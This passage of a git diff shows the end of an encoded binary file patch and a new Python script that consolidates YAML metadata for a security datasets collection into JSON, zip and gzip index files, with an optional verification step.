z{xphGok()#EuLRR0nndR42NaviV7=Y%+N1-6iGY+K_K8+_#17)e`)soBv9o32f^)~
ztp?;A9LWu^1a+@|>1mMha0BDZrz&oNVv%rRMSow*#SWnbYt;fCxdGS|KE4hp&;g_X
z#G&_OJjSIB1N%T87<@?JYJv-h65uQyXy3Q7)E1Zt_$j>Eeem-y-ofdo?Sc}+h%!v?
zL;?CvIq1OxSYd<4;<^?nMGY802*MTcbr<T>K@3pvBr1TEgocKQdSwwH^5sie>`T8d
zZnpz?D@J5E9s~%WeLZKyU|m6A0AhSv%Qr%lttwR~Fa5L}nkxY2E@&3uj&Cn5<=+2Q
z0C)ulLO+<j&0f`GuUpl(1P+YNqFkd0y;g**W5W_bgA(w@G(;Jg-#3n${)kuQv<XmS
zz%w5BKnq+&&_;)aP$ZdG7`X;E4KaExD+DKQ#p#TcC>lZSDj5S2;n;BlAzer@VTMBq
zLm)HU4zSc{2a=@@mYSi8BeQ{lVq`=yC@F{%$Px$|J}v@aB&<Y86vRwuJ@X!i7ZsT>
z?(4n=9k@T@4%nh427`#Ff-w{bz*8keV826e9_!pi1AuN0R;I%c(EJWf-b=tS)P_of
zVkj{YG?;)k$VG@03Q;`<V4hM9Kn?>xcC(=d2qXDUBxy2Ai3dD{Xy;%Soxmg}Fz-Mj
zKoRD_fq^D^d^$&xC+GZmkHDyyKvRLx^3|tFO(<-E^Y7j5!0f^!+BN~9+p!?wBIE(u
zQ`~^rd3eJ2l~#mzaSlKt{u!Mr`)#0%;be4Ek>IBo(Nv)wtO!*~h5nAJ(aUq)^zGC|
zvq6Y;0`JdwvT}zj5E|752U#q5JThQxrG_z>3_G5Dp`OXEb)Qr)bkVz)!|{z2fMJj_
z78WScYb&q9BTQwxfH4mmsr#5ffR9?64Zd!lBDe^Sy$3-|fCu0J**-YvPg(EVz}!%M
zAB?=`*YYL^`q~(XfPrEOAqGKYkzaL%P^&{Vy#vlF^M|LL1DYh!-W|oc5CWj`uJRRP
z104!sL<Rs@2x^ymp7@~nj}E0_BoL7WVhlx(tqrE5jRZMUKD%`N1<D-i1M~x-=jW!7
zp^PMAK$NW!h6We_U=<^R;f2&_Di(_bCHBlR3M5z}m>C#eD*Foy5(E(I->mfgybT}n
z-RC<+)QB5xv_Q(pzGgmz0Y3n8nqde!LxQU;Unh-Xs?7`|W~>oX+=ib4sde^`m$1t}
zcnIoF{<Y7(QQ9tMCAg7B4Bz(P;0RzK&g)A1$vVR94(jH{C;-=&EC+-qwE^lysDc29
zC?cYgK!gih40|ZEIpSR1iiiz^0ML>`AV`80DiMiRASg*vSc)12DutlMj6i_<mPz<M
z_@EE7VTLGqBTis1&zNkd2^`?r09^Y=j__Ng8}eodvjr?H?BO6C@C;oe5Fkv1GEl-m
zprsUV3{}vRy!zzieW*J6JLnpzWG+F7N#HVeBnlsLMGu>CI7d(m)FR{oK?j(ZI)E#p
z4)8Bvh9eP?MIHCliG&OYiFg@@O|%nt*Nd-328)4C$|NM>#9<i2P21>YgFM|<E$_es
zjmbf7Iw9e7q>@R|z)c{M2!S}qB*E+)-ob(*UJS;OMv^3q6oi21tk>*5qriGV4EZ@D
zWd-wEXXAkgC^3*Ya_t<vnTIVDI-q<7QK%Qk6hjo_e34%97vH*f$ei3E<<Ot4VqoSE
z1H0UqlBxnvo8;+-zjgU_<gq2g71_x-!%Iy2#$m8wg`YWw5lR{(<Ojn;{Q??Zx_}I7
z=_-&SdXuO{sq~J<Boo(HD6z{z0l%*qM8Ll+TT**XW&%-jaz{vEf5C1=GI1nt_bT#{
z3FD$lHIxUSz5rM4u#g;GAP*vVFfzqcM}0P3S9c1BuKIOhxbtx04S<8848RxB18ftq
zPs3UubU+p3O+Y#pEyxIZ<DtJQM1n~PBNztcprD!&H^40o3l8g7C-q`EQminlm}yRg
z3sG;{0g_;15l+P3opwZDGILZD8COj#S!vVHrmTj?;POYrXKld144+-0!0b{Uj~zBW
zCbdAxL3W`^H*6(2b6J3eS4*izr(hM#1qoKt#ibun!c+BFF{}a=1oj+IPSdRAYAInK
zQF?e{uJ|RuCocXJR>^`Ji<D%Ms3jRul!xuX+AIW7UK}Fg3$>!Cf`(5)6p>M91p|Z-
zAc3J-9gTa_-n|NR>Q}6LmXHFe*-<F;TfkV~6!IX4TS|&iLrS0&35R~(ADbYlFrt|P
z2r)#oL;=zq9?shUrhYl$50hjLkwvcCep^nfNN3qoxgTmbTu5K4nk{Qg6a2L-a}h{}
z&Yr&;>=@;&i%fyjgg4q9;-exU*mQcn5^1<XG81V=tpyb7)My?SAkl;z&;o3_JcndM
zccM&GPiC@1UA}LV_<S^}Sh&Cm;wB(i0}oJ)C=(bgk;>%swl*d)QnNQaL#9Gb!}vj5
z$4jU8Op>v&W#LI76OCn%A7*!p(vVYw$rQksRfm!y9Fj3sB=r;wyfEV#6%Q|07HeU+
zFm6zQq>8B3jEbt)Z)j8}M8PM*Do{icia&w{8+<<a*dS+yyd~=ESwoP~^ePBUCeL4!
zgaJeXWv)+%c=S;P*b|T<#Eb~2sS*REaE|~tkxbi7WDW1SG`yVfgc-{aJR<Fl%Pf<W
zeT@ISC_d&R@1-O_QWPOed#0*noA*W_eLqH9l~?}1m+ikJI{v(iPQE$@%0(d=-sc*W
zZe5h2)NU%_$Gtj3sFFg9(%6SG6aqSt=W$d(G}ObXDIWQFZE-Q+a8w*X)-ORpdWPcQ
z40g8`VuMCu2_Qx>BzwcRaUq)au8Po<Bx2J<P)tm+>@?lCpSVgl13Ajr1&!)pWiB%!
zU&I*)3h;W3a_->}<e;?+qy$cXqv!A4d_G|RjlWZgM9Y*$1jJCJEfkGFsUa9}G0@RJ
zDeDL63kVn^x?jW$f5041cj*iOA55V`N<%0#2AGS)SkVwD^mt+&v>p;jL1%!9gDl+G
zl134fSM9gP>Rmh4QkTNLoqfuV&)=Twu?*o5_2oji40P8R*eNCFg%0H(k2%T?3yI5~
zth`r+E&&9hU$-9@J>sJS7<)$pcX2@3NC0F&R0)Z|4MswEfN$Ej4&b0EP7+FlDwMD3
zv04D$j+4+pdUpV%RftkEEyj$~@11xL`sWOAU>O-uh{ymNCfG^^qU3HtJ8?3g;2*Pt
z&}%EJ%aea7$jKlK(MS0HiT>V<d2_tV^8C7w$AMnm<E?~%NhBX#R0EPH7n{O%j4)m=
z$<=e6-blW!zZY-0=c@fs4DcbT)yucl_ebdD_VPV(dHq}-t7lKJ+0!4U)4bCeaqZNj
z4#t#_B~Tc0UIs?EGtB^x<btP%@z9_jXQ$n=hdfbxkX0y?WE>RqUS49M#2~6!$;a~J
zl%qmJ1V&<pB#@N-sIveHc{xKv1QHNRkum#NVoX6$1Vke!GepuM6Sx=y1f0ciMawY6
zGGamqQlQ9JG|aOX0%VDqf+}iiCaM^cAZVh1qM3lEqu`K3AP)Fou?TeufiOrB9uPgZ
z5XM7Ca9SuoieBgtcZZUIQUX7me&&w`zE9JSpFyD=EU6>2(EWO@sn=9&nK@HIH|*%*
z+4Az?@#LOJKjYBhU<22*r=vxnsd*OfK+u4B<BA~7Fy4f5As{=WN1XK7bS5AN)tHoh
z5*Y>gKrr)=Y*R>K3GXKOzCvO(I0nZ4Q`^6Rfql{v0|6l-zlt>crmK-HsG&eJ!AHta
zb`@ap80xn?I2`xGgRCtSHH3Q7E~NFI@t{oIs|@!P%^f3}7^oCdh(iNPD3<Y;74Mk3
zao>V^Q9J-#G@pJinLO<>C&S=pwepma9dHClP|2iNC_jhot0+Jru23K`0Ww2hqRYlo
zicbMAPnMxxNuiuM6lX1Sj_wa3-UtsTWh0xHG3KPG9;+EsNd!|4M(T!#&jEmT`dkG1
z(B%^%Dsopq?}Yi3BRTd3Dw-GJBv`-%6jVyME(Qrv6p})ttosuah#(wEP^W6ChU(LD
z!mR}cx!b`(!^keEIe^n5ltC<2EFu!HO#v$iRpwHBr;zf8=Tskah4pK$PimTmQ6Ow#
zL?s#{TT3*Ivb&67q#Aph?c6;v=zu$^a0yZ`F*$%UTPlt`$QQk((h(QCg}{Ti)7Jqc
ze+U-^I!Uxpdut(3<~9dWDu;Hrfh3BZ#L}-kdN{v9A))Z!8b+!)Ny`$Dh#zLfIk`~Z
z`S;fZL%f%^*{`8cZ<QVH9yP(Z=tXI14{*-LlHg*+f&8h#OSr&B@iy}y$eQondIr-X
zhhJuSZ3R@Pxqy2<AdrbjRcmpp2Cy#?L4g$6`Gn9VMKs_5GA4(U^xp1awKB*Ce7s%g
z6n?arjYvTx0zK6KFGhd^N^R>r&PTbH;z$^po<qdJ7a<}bAgHJ+Mu3&2kfYD~4*I+y
zDu_~urDYF`?*ZurIwki|A9esUnGC}?LKq3!puIN>#!abOJ`SWavL+D-h&UL+1cVI+
z6LOEd#8nd{6a>X|brmpIr1aP*SV(~wAr1!lswjj&?$JTyAPev)dlbPJihoWg01kf&
z?I>j;uxw%!g%J`;gHubAWHKxOj7&lJ<P|#y=P*=2_!0yUDD#I{a^~blNNEzJBI5v}
z5=tBptimk7mGf(~8fF22kpSTYsD&z}NY!Grr2(fdd&9=6n%F2pY#T)t@{t0G>cA*Y
zkxDVoqobo@qs_2sQ4iR3{aoj>nZ!IBDET*TmN6Qrhdrhk5LTLLW;j-6<`xFSq?l|P
zZNr(u<7KIanWh6y6ltNX5@xHo3=xDF7-E`?=54wfX`(1qo7|P!KMbJNx$g}l#sPl%
zwl3C-B1B4mEF#*G_`dWkD!#5!!AMDMPZyG%RG%lR{A7;5NuBxLYcC|Gtk!0~lV^5D
z%@*yVqb)RxcJB?10%(q&{=NBKI_}E(b#2D6pNNd+-@9)VPnCFiOzwJHcw7VSzMNpz
zc7hUXzDQmQr-Apr!e<2|wjp!F0waTf4Od2^6(Cwa4POpASfG&Q3CCDNZa@M_zZ^>m
z@0sN5ltIN<=gUw?b_dy*4RnHI2?$Oono430td}czma0FMgdEhfvzZyRb>Pnk@9wVd
z^8mQ;fLC!Wj%#(|PFonp3@4_f@pIDZDH;u!Fyu<4iHXj2CuIsPsGE>87hHrK;&S9Q
zB9BnV3%Dz*RS;Vi#Kf6*IWH$jQ#eN*M}_p#<&(yi`(w?7mL!7!!UVemI6HXp*r>_c
zGUhkTlWZZkVFAd^%{>fyQcgEs(Pi>l(pVcmVbYBbT1z#Q39O?h>y>6}j(MH%&ib7Z
zSg`<#sRyV*VrK*(t0!)O#X;^O@DOAYqSHhn3YrpBff{3iv(7o-lmN3Xz3AyPnXZH`
zb@xD)gSKO+&r?an)2S+^Nr4E085LKlq~?%N!m3bdW%Fu0U#lKnynS}5K`_5IIK7i-
z4=1DEQ{on}9)9xCD+X(zYHc$JAoqzS9`sTs4&5}}#QB|qpz6XIg>j5UUjf%>mQo=Z
zyv)a38cCSYaa~3P_3H^QW=rzyqtx0%Q&$*gm5#BBw@Otg7Otx5kRt$1Kw8<*+}*_s
z&1R*-vaHtyZZuGCToDk`A%ULD79x-ZHV`LSiiTsX@4!GY021s-Oi1Q{#U#S?5l3SB
zDguW7Up<~;ZFgspr7RBejd1;5ElQgg;G}rPvK)N9L(652@OV6UoK#0I)zfc#Zk;Ty
zYSo8~<dQ(OazhEUQXLl2dk9^X8z{vRR%W|*5XTZzZrra}TC=>X;>lt;z90{DePkl}
zPpVIalZA-F2p`)neDcv(5Zyrs04v}R!g>$C{NNpfax_N3+=8B|IHC&7m3e|+EltEm
zXtCyc4;1v?UAXXk3Pt9n=ZVZs4c)@8UgVjXF;_E8B;-_22P8*8bK2k((5y@(vDm?h
zpHUPrMgxhLX~RS4`gSnw(=9Ug5T4{=*>OSuLsX`~`l-;)XdA)D-6Z&Qlj0u-94elv
zMIyx$MsTk97Fd#Si5f{CV`|M%5c@BMNB^W2=P=_`a2k^?S<2O*@P86+AR+=d7AnzJ
zkrj4ai(8v73y8GB4cXG@h(dUZy)9}(uZsFV-##MWHIMJta&r(aeVnMSgasdITnLHF
zntjI&WS8)Rmx9ohKP_gAE$T943@)strWt|<R-%ylk0=7{vdDE4$qNKFl#LK|m+jbN
zqhuCoM^tbfS6r2F(&Eb;m4P8S9`ZwMlykhWkelFN4_2F7LuX=MDhy&P1~%jaio6mA
zrIP{u-ha*GG%eymMoz6Z8d$wy=u1`SmgB(976Mi!5Dmq^OEsyK0j4PasevD4##qZM
zfaoBt(M|fe-<|CfwIB{S=K$76$>A!D$~la0OD8!*Objcy$I?7-hPWZBRAFmdeqFlV
zBsAhHo3o9=FVI9(@x}k(`xnAKA?T78g@}ZSA|(irnF0^lFOVS(0XG7WMD#YYBnXiN
zQiL-sMF5c?p%7+Dcs3o}sYI%%$fE`<W+SBqr5pD46A*<gCTKx{F|Pr^VSY%ELFPn?
zsht$Cv0W}vp#d+7B3`+NPeKojQ%P{$1$<eFtEvS6bqo$-2AJ~@-yvr+8c^cXtkxLx
zT$`K})L@W+YXn}If@l&50FsrTJPfiYw3A^_d;>8C#qMgr-YbW5!3eY&D40cPK|MqQ
z?Y<|11$`H{C3HK@eE2!(C4X*q4eEm&Ns*p}>SGxQLLzfOFbHyR%&3#$_(AXf&c32Y
z;2@BJs*gxmGcTc3z#RdB*jY9*bVL!|jnD_1m<=&zg1-%oBCjbNVnQP#s29h@00UA8
zeaKgZHWwJ1)v^j!fJaD&p*}k0yHa{C?rNcj-O(aIDy1n%QaN3mUJ(v}F)(n^1DTfE
zugiO5kHujQZbN<=BfuT%8bam2=P)+j^mp(Bi=+b&Nb#F977Ctm&!+mgtAs2Nw8}D+
zsSryi#A0B{Aqi0u6e2>!6CzL~!4gnJC%dj}K?oTYOgGXagkqrE^`nMxuz=)ZL{aUE
z4o(_kx=tdH8kU{IgPN|+aIk`5MUa9-<cXdx7)tQPP{ITvE;cyJ3<gX+b+d)X;7%NW
zAOX$*{x~U!MA{G+0w885A;W<`@7##f4<RCBYKO=}hjcaosrR%c+hHx?6%FEm;6dJ^
z0R{ltXNeGbPLU%`&?!NnFm`<P1qN6)BeP0290N#5Ik2O^Fd(oHas-CReSGR&$R2?O
z@5tA<qC-zLQxFZo^c;bE<qszTaPQ8#ts6`nrX>coaZpRHL-&b*hZ>@C9UY-^FH{4s
zSBH7*GOO*jF%Ah1Y+RNQGUTtrqm+f<4~4E`)C>oH1yz*}9b~c?NiZQGNFtrc_^qHg
zd}WH}oD9BTeK9hSE9*cTrCgD>*QwZoeN}@{S-WmLa03$q1;+?tX}g#P5qM*g@jMF9
ztcG1d7T_FUke%+*qq0V!d=!VlC^e1gS(IU6kB2uxk*BiewNkG0l1&1vEGlC$3K|Rz
zq?!w4H3d}_bGcE|nZ+@lWPdaiEM8?4Xiuol5Run7N#RWJSp|<nMh1+qXG@fcL#+sv
zDRt1X$3Vie(TOHll9%_KbF^PMI3y}U??xtw4B&^4EGw$)w{(pL^JQ}ziEJ?LHK-Df
z1y`HI#l}q3Xg3p9trXc6AImku;3JIp^C=k1z4W`*?{cx1+Kh=LV_kPVR<Q>O2Lzne
z5_O#uF&Mq(T!5jhBXNP;1XakI?pd5@-d8iV#5_j`LR1Gqp)^%W@GdEW1wf)0fNii4
zIRbe#)_FMNr*4Kg-V()Uv=oxSG7>Lzbw!%0sy|*kX`NCBM(!cymLMWn&@xPXL!i{{
zJmv(VH|5V5vp~V{r0>)M*qx$C>Q2WiB@@cC12qV_F?dTYx*m|8P*$U4VAN{#5Og+>
z2+{$eh1KOTzD^<?Zi_g%TR|HP;qC&SOmMO0xUuf)>z7rO1f&^KTV|FlW=d081|_VD
z762F<BSJ7j2?T^KS6*T7U4{Yb>Z=-fcvp7Zy*`{U`RSHj82;SrmN@cFQPold+&hul
zq$+x;6l6Y*RwTWFBt#k4{A%kTozO&>Jr0TAsCV3fP!nvhz^PbZ`*<)uL3nSmo;rYQ
z`a10+S%v%eYpTGD7x#H7QRKy~5hhc=mz^9C(_pF<18bv3#0ixxeb?H#yE(2F_nPjT
z2Zv4i_Lg~z0TV_Xfg_`D1gbdzoT?w9MBjT3<pZ^L*jQEQ(8I^xAoWyodJ)=T^>m?(
z6%`)qz>h1$s>V1{CF27zbW51QA}eUjgSbj+I2uheB-D{eAVc8C!-#j#^1bgsMI}Yx
zVB$#%83)H^fJnqPY}DguIy_`3VhGQKL45vD&;!jXy_o@mA!H7f2ZytwAqY=P9tI-s
z2<Hb4VUMgVf#*JY*#k4erXmO!fQUi_k_n`rbQMO(F8IeNlql#ub_)?li4#2Wk@JKG
zOQTW|0IA{!U*h<4d!R!M0x}A|=kqBO>cP_9yk0~mA@woOC<8@AV?zwXA|jJv#M&vT
zj@f{6!H%b*Ho-B>#OpK@u2=zJ7^seA%}qCk5E^b_%7soJ$(%IB>47?fi0OwmG7;q9
zT2T1_^@2E{vxGoSkp+kaGR~~Rh>$cUi8>(*FOCPRUoU*&J)txiPDbYr9Ks&Z4x(1#
zfdwgvy(bFPhdwUBsn>y>Vh;W|NR%Cc|Ew>SG{?G{9aaTS@I(>N%0=3uCYM=BdjZL&
z+A~am41w@U3QbWdUiB4>$050KDG^*?q(FigNpmF^5kNMyXJWGqo&jM~Vnk$3Bal*<
z@1b=nF^Pe%GhuCTCn+?cY{)gV<5VXPjeKD;VRM7mh5F463}lD1VBBxa$W(6TPY^|5
zOfEy(G+nP%3euyQFLFH`c@zgcbUphp!tz}Xl-&6uag!)0540e_AC{z1DhS;V*Guf5
zb0I^CKMYWI6LvIzPoK)Cp|tL%B_V?e1o;adLW*1q(Gi_%4te#&3gXzK-~gZk_iCG*
zlq;a94%;@}lA?q!d*e_)Cz<LQ0tk@^fe_zVJ@^%MY(P&zrFn{`B#rx27Ioy$8Vt=o
zem!4S<&srYks$^%08>fBVs~x?NgofFa7sHH@h7A)9mwzN7^!kMkc8N-#iz|u3CmW>
zCD-FP+jMR4`Yi0pWTrz)o(mXd6_w0rY6cCE&7hr&7Q+af9{9rnN)#jD3n7s_H(9O2
z7;7Ojb3lNz05yYPD9o6gOe0kWR2`ThbY%%)4PzQA)ru_1-F0*<EX5?niP-3zRnRd4
z3QPsW$}%}x>APsCIT<d(8RLe|n01ER9rV;)yvJW6pvlD^m_?-z2^f}(3FXqLIuOx;
zkfpSS#3-!G*6p?KqHq^f%*rk$@!qIuRY(RTLJ$FDK|tshnq6e6gOcnuZ|20=5^LB7
zt~C%HL5OcWQ4n+VIr(Um<7TV{1XXApC~ps0Ndy%oN$JHvh)!@yR}ce?NJM#62NQJ(
zgWT|Z$Y`Rsl0g8FHzQ;)vMLTj1-3==fadbwK5)_sg+Q{Ia`LJT%LNe(mC$Y!iM20K
zb+%nF)AuxT2kWg_#UuowNs#h{hMx#&$jZb}&s~pM=VYtzf@DT6fIKE6DNN(l5GD<v
zV+4xMYldN^1v$ELWJEYiK%!LwUlbp{D7P_@1co_gxn5P~aBwsI*!^hlFW3~|efaDx
z#EL&OBeXUUOA641>Y{zIR7a)X>ce{2$pf0sa1G`g0;(5jLSMWDkePvFfjmcm9?u78
zp1eQ@G*3X8?@ss**c}lnB#MCACaGT`LwFBoh*49MUh_OZE)6JhBCqIxICJH*fmDj4
zi5>Ea-#Ncq>Wk+#wHlsQ0A^-PFv&A2Z<AN)u>Uk2cgy9*jW_(<XT!4TP`T~4X5~hd
zjxf{#Cu$P_CPnQ~aRA{5ATE4V1PO2?kQ#U`mtXZHXAfuAU?ap1(s+Q0^=^_y0Td8H
z0Xx&_@x%`(SO<temBrGP2t*_zhn)HE!=rc$K^OxRItG&66iOf<yug4rH&`<OX-dk>
z3laE+NJH%)0KkD@5%um3qZ3g6gZ5*Sl*54#k_-tFJsh|q0f!}W{6nV^y?zfSeJ8Wf
zkwhW~tn|MGAVDIuh`%v0AQdVK)KgiBu8>5Eus}a1f_C;Q2Dl2;2hXrTg;+8h&w?ZP
zj>C-62#WCoxOzXLVq#>03Mz^jXkf30)V`rckOE1G0!TjZpa3_i_@Z)vH!wcB^c*O-
zSb}J@UA2;p!668~@I8XoAVoaeGfyqeF+5By3Wd{AOL$y`RZ>N_r@?|)H`(PeOd%#s
zP##|DL!3Gg=qw9X=`tmK<g^NGLf1#Af#2b5fd$sMK5z_OjtmjhZN(_tBuXJEe3m!Z
zx*VVopz8oz;~r=r6#+wv2wG{4Bj}2Jq<z}Y&2Er8EQPVS)vyFg`*9QWKtH!Xcl}F|
z0?C!axxylQY&4KU5M%`0o(-ol;_|1LxCKacrpSDqr^!9&`L9l{1YErO1|aGj(|jL_
zJdhNLLE#{W6lCyW@DA_Te`$e|q84ca1ObO)na6_Uh%^PvHL4CtoCpKn{{3oPBtBnX
z<-4159PJ~+ux69Xx+9Igi`byekIP7T3Ra)+V{$buZp@x<wlgHxFRr|72=Uang}#3v
z3=gkvOZvC{^78q*do=`hve+^rSgzmngD!u#m{24_NsS^i4&R6AU=oWK@}O`+0*(M1
zOtDWP2r&tzma&Xv8<JrD04;-0v4+F&M`IR(KN@M+5D4^M8Ui{Gc7g$rf<Tr#pli_K
zfD`Y9G$EX#uSBD6qzlOKK@#u_od{`cRW<8-pqjG}RS(mtNAQ4~9fj(FvLF&5>%uEV
z#Rk-Y{lgDlCa`7*Uy9KVg$2264u2+R(Ys%}@at6r#}H2b)B!3~frwsu>ULgP<Vcm0
zOS{<d9DY*HT)jHRIII+wG^&s!3MNq>)z8PnflCy{>(0O-4iMzYn=s)gqhZkB^aowP
zWb%4=dL9@C6gsw=Q-%wFhtoxEzM;91=*w=yv%Q?m=49tNnSP888B^sBLa&{MRuw;s
z_^;^JLlQ%8xFl1JIK`F&E2=2G>tp;a+4B~_<#eZp^IKMf-6GC0f-42cP%yNHRjV-|
z=~EAc)L3PKh?IaVT9<+L`5WKwJ>J=QBz&e}a@^w8=lnZEAt~L%*-YCjo6;WLoSyw|
z!zRYna(Q$_XxXfAP5ksP#&}<;{{P4Bd`jKN^7tykTB$(^B$MT<vrmi_R0MH|?}}5r
z*!0cmLZ{-7yVXcT!s0}=6)~`)U=bA;jQdG7YQsmt^>^FmPv(iPDf6DNQ^;taYs;r#
zxDsL#L?Adqtp-JTQqj29N=x*0xn%Sl$R9uq#8EXc?njhQerK-oyZnLk^ISOOB#?%x
z3WSGI7NLCv!rCx_dNuDmB03<e#HbyM05nuKPNFC>B_Chupyb<HplTE~$S_0*5LhHZ
zkOYuaNJZVdPA^ivpKL-?W%z?o)KVV>k`HzGtj7@S&U&%HAoH+XVCZ8`u~<nU#xRp0
zv3R^jk4&V7P~&-6tb-2{>(Qfz`20=OJHvtpBt3IfZxfBvRo*??dZnfk+h(re#+DC<
z*X;8L0wQbe7>c<vRDmQU1Vo8MOF$6;K?I1w4GNTnK+?=Y(UsAfUj^rc*!lfk4~v1g
z>^~MO?EZZ&poE`>2v9~UvM_^1P)kRf$@l-q<L$oK{hy1(2&nQTWW-J;1Op7fl;_9z
zf1Bx05A7uiJ14?~jGf5uKz|utvjj#e3MA!y5~`^FylRn;n>c3-ycn5L0DnXOVKel?
zjB^=cG~(26aYh$ei;j(0T!hgVC9*`>v;)7=Q6YAeCdnL{ljL-pay8YhR^(G+$t}w)
zf~8aFTqRK$f-a&~jI(sJYZ5RrO~g}_1Q3Kdac*wB?1fb-<_Ay`pAeB9?vn+ELk$v=
z1ZI>QC#i*jppX^36AFiUn2;Aap>8r}rkR!znf-!qs`6mau=Idk=)b@6cKNjB-Lgr#
zmE)cXIsIHCK?sg9T0lEpxT<scedIxM)pvzc+~)-@qn;e)iA;#w!E?=aXZGT%9IQo&
zQZV^##6(0moM5a<g$5L9fP{Y;@Cc<=2g917ZapkktI>3?y99{>@cIxRsc($or}hFu
zonJ{U>WG~nQJapS<=#@BYhNPwVMHe>D^`Xc#rL^9HIcbY61^a|dmv3{9x%YeB1oDw
zhgT}0>VyJDC_#Q@9yrAnNCW}vG6PC)MASOU3f4)s86l<-QbiL{129!GL;(=Rf$(b(
z%j_aPUj1K3Hp0e;K|%FW4zegn%X3DxeY$!**!sG7zrX`lEV>3j?0nrCoPQCuZ%$EL
zqn_O^Q-j5BuEi|15NBX3GF{{K3~>qvq5v0nTk9Tj4VdOhAs&mFW%o%;Uj5q}ur;5a
z>R%1JOZqZM7l{cCBGW-tMJr24NFzid!~;Q5D-jVglq*6>07D?i1yL~ng#2&z|C@il
ze~a{)Naw+hRiv0t{Nx;ngM<)p=>D_(F%E<Exrb;-?ieS%?w<ke|4M##nTi4+X=s+H
zMuvyi{eX_b6dMT2LX=4X2uH!w?fdM1rrfbc3Jz2Rgo0HS5H!RTM1?Ih6ezwnlg;&*
zX%GL!+>uTcBqgAVGC)vE0Rk=nE&u=k3;>vL7F90+k_(>Z008g;1^^TQ0000000000
z004ji00000b7f;KWOHS7b1i9ZWMz0RYIARHP)h{{000000RRC2LI3~&(B=RD0062M
BwE+MC

literal 0
HcmV?d00001

diff --git a/scripts/misc/create_json_index.py b/scripts/misc/create_json_index.py
new file mode 100644
index 00000000..fb26f851
--- /dev/null
+++ b/scripts/misc/create_json_index.py
@@ -0,0 +1,203 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+Create json index from metadata files.
+
+This file is used primarily to allow remote fetching of Security Datasets
+metadata with minimal latency.
+
+It creates the following sets of files:
+/data/.index/sec-dsets-index.json
+/data/.index/sec-dsets-index.json.zip
+/data/.index/sec-dsets-index.json.gz
+
+"""
+import argparse
+import json
+import gzip
+import zipfile
+from pathlib import Path
+from typing import Any, Dict, Literal, Union, get_args
+
+import yaml
+
+_SD_DATA = "datasets"
+_SD_FOLDERS = ["atomic", "compound"]
+_MD_FOLDER = "_metadata"
+_DEF_INDEX_NAME = "sec-dsets-index"
+_DEF_OUT_FOLDER = ".index"
+
+OutputType = Literal["all", "json", "gz", "zip"]
+
+
+def main(
+    input_dir: Union[str, Path],
+    target_dir: Union[str, Path],
+    output: OutputType,
+    verify: bool = False,
+):
+    """
+    Consolidates yaml metadata files and writes json output.
+
+    Parameters
+    ----------
+    input_dir : Union[str, Path]_
+        Path to root of input data files.
+    target_dir : Union[str, Path]
+        Path to save output files.
+    output : OutputType
+        The format(s) to write the output files.
+    verify : bool
+        If True, verify the written files contain the same content
+        as the parsed yaml files.
+
+    """
+    index_dict = _metadata_to_dict(input_dir)
+    print("Metadata files read:")
+    print(f"{len(index_dict)} folders")
+    print(sum(len(fldr) for fldr in index_dict.values()), "files")
+    print(f"output to {target_dir}")
+    _write_index_files(index_dict, target_dir, output)
+
+    if verify:
+        _verify_files(index_dict=index_dict, target_dir=target_dir, output=output)
+
+
+def _read_metadata(source_dir: Union[str, Path]) -> Dict[str, Any]:
+    """Read folder of metadata yamls and returns dictionary."""
+    return {
+        str(Path(file).stem): yaml.safe_load(Path(file).read_text(encoding="utf-8"))
+        for file in Path(source_dir).joinpath(_MD_FOLDER).glob("*.yaml")
+    }
+
+
+def _metadata_to_dict(source_dir) -> Dict[str, Any]:
+    """Return consolidated dictionary of input folders."""
+    return {
+        folder: _read_metadata(Path(source_dir).joinpath(folder))
+        for folder in _SD_FOLDERS
+    }
+
+
+def _write_index_files(
+    index_dict: Dict[str, Any], target_dir: Union[str, Path], output: OutputType
+):
+    """
+    Write index file outputs.
+
+    Parameters
+    ----------
+    index_dict : Dict[str, Any]
+        File metadata dictionary.
+    target_dir : Union[str, Path]
+        Output folder.
+    output : OutputType
+        Output file types to write.
+
+    """
+    target_dir = Path(target_dir)
+    target_dir.mkdir(parents=True, exist_ok=True)
+    json_index_path = target_dir.joinpath(_DEF_INDEX_NAME).with_suffix(".json")
+    index_json = json.dumps(index_dict)
+
+    print("Output format", output)
+    if output in ("all", "json"):
+        json_index_path.write_text(index_json, encoding="utf-8")
+        print(f"created JSON index: {json_index_path}")
+    if output in ("all", "zip"):
+        with zipfile.ZipFile(
+            f"{json_index_path}.zip", "w", compression=zipfile.ZIP_BZIP2
+        ) as f_zip:
+            f_zip.writestr(json_index_path.name, data=bytes(index_json, encoding="utf-8"))
+        print(f"created zip index: {json_index_path}.zip")
+    if output in ("all", "gz"):
+        with gzip.open(f"{json_index_path}.gz", "wb") as f_gzip:
+            f_gzip.write(bytes(index_json, encoding="utf-8"))
+        print(f"created gz index: {json_index_path}.gz")
+
+
+def _verify_files(
+    index_dict: Dict[str, Any], target_dir: Union[str, Path], output: OutputType
+):
+    target_dir = Path(target_dir)
+    target_dir.mkdir(parents=True, exist_ok=True)
+    json_index_path = target_dir.joinpath(_DEF_INDEX_NAME).with_suffix(".json")
+
+    if output in ("all", "json"):
+        index_json = json_index_path.read_text(encoding="utf-8")
+        json_dict = json.loads(index_json)
+        if index_dict == json_dict:
+            print(f"Verified JSON index: {json_index_path}")
+        else:
+            print(f"ERROR: JSON index is different: {json_index_path}")
+
+    if output in ("all", "zip"):
+        with zipfile.ZipFile(f"{json_index_path}.zip", "r") as f_zip:
+            with f_zip.open(json_index_path.name, "r") as f_zip_file:
+                content = f_zip_file.read()
+                zip_dict = json.loads(content.decode(encoding="utf-8"))
+        if index_dict == zip_dict:
+            print(f"Verified ZIP index: {json_index_path}.zip")
+        else:
+            print(f"ERROR: ZIP index is different: {json_index_path}.zip")
+
+    if output in ("all", "gz"):
+        content = bytes(index_json, encoding="utf-8")
+        with gzip.open(f"{json_index_path}.gz", "rb") as f_gzip:
+            content = f_gzip.read()
+            gz_dict = json.loads(content.decode(encoding="utf-8"))
+        if index_dict == gz_dict:
+            print(f"Verified GZ index: {json_index_path}.gz")
+        else:
+            print(f"ERROR: GZ index is different: {json_index_path}.gz")
+
+
+def _add_script_args():
+    parser = argparse.ArgumentParser(description="Security datasets index generator")
+
+    parser.add_argument(
+        "--output-path",
+        "-o",
+        default=f"./{_SD_DATA}/{_DEF_OUT_FOLDER}",
+        required=False,
+        help="Path to output folder.",
+    )
+
+    parser.add_argument(
+        "--input-path",
+        "-i",
